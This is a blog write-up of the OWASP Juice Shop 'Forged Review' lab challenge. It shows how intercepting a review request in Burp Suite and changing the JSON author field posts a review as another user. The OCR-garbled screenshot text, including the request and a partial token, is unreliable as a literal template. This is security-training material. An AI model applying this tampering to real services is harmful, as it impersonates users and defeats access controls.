Hacking OWASP’s Juice Shop Pt. 30: Forged Review

Challenge: 

Name: Forged Review

Description: Post a product review as another user or edit any user’s existing review.

Difficulty: 3 star

Category: Broken Access Control

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-access-control.html

Tools used:

Burp, FoxyProxy

Resources used:

None.

Methodology: 

This is another instance of the server not comparing the logged in user with the name it’s being given via JSON. The first steps, as usual, are to log in as any user, open Burp Suite, and set up FoxyProxy to intercept the packet. Then, just fill out a review and check the packet.

Banana Juice 
(IOOOmI) 
Monkeys love it the most. 
1.99m 
Reviews (1) 
Write a review 
Review 
All I want is to be a monkey of moderate intelligence who 
wears a suit... that's why I've decided to transfer to 
business school. 
O Max. 160 characters 
X Close 
129/160 
Submit
Burp Project Intruder Repeater Window 
Dashboard Target 
Intruder 
Help Logger++ HIT P Request Smuggler 
Sequencer Decoder 
Repeater 
Comparer 
Extender 
Project options 
User options 
ISON web Tokens 
Logger++ 
HIT P history WebSockets 
history Options 
Request to http://localhost:3000 
[12700 
Forward 
Params 
Drop 
Headers 
1] 
Intercept is o 
ISON web Tokens 
Action 
Open Browser 
Pretty 
Raw 
Actions V 
PUT / rest/ products/ 6/ reviews HIT P/ 1.1 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; 
application/ j son, text/ plain, I/ * 
Accept 
Accept -Language: en-lJS, en; q=O.S 
Accept -Encoding: gzip, deflate 
rv.78.o) 
Gecko,'20100101 Firefox,'78.o 
Authorization: Bearer eyJoeXAioiJKVIQiLCJhbGcioiJsuz11NiJ9. eyJzdGFodXMioiJzdRNj ZXNz1iwiZGFOYS16eyJpZC16MywidXN1cmshbnuioi1iLCJ1bRFpbC161mJ1bmR1ck8( 
Content -Type: application/ j son 
Content -Length: 17 
Origin: http• 
// I Ocal host 3000 
Connection: close 
Referer: http://localhost : 3000/ 
Cookle: language=en; welcomebanner 
status=dismiss, 
cookieconsent status=dismiss, 
cont inueCode=xI h 4t x Ij s Li ZUPH8uxhgt ITXFRf pS8H2uot msg i rfPSpJuvvhOYcI 
'message 
author' 
'All I want is to be a 
'bender@j uice-sh.op' 
monkey 
of moderate intelligence who wears a suit 
that 's why I 've decided to transfer to business school

Now all that needs to be done is change the author. Unfortunately Guenter doesn’t have a user account, so Amy will have to do in a pinch.

Referer: http://localhost : 3000/ 
Cookle: language=en; welcomebanner sti 
'message 
author' 
'All I want is to be a mot 
amy@j uice-sh op'
You successfully solved a challenge: Forged Review (Posta product review as another user or edit any user's existing review.) X

Prevention and Mitigation Strategies:

OWASP Mitigation Cheat Sheet

Lessons Learned and Things Worth Mentioning:

This is my first real interaction with the NoSQL database. I’ve never used one before, so future challenges pertaining to product reviews will likely require a little bit more effort than this one does.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s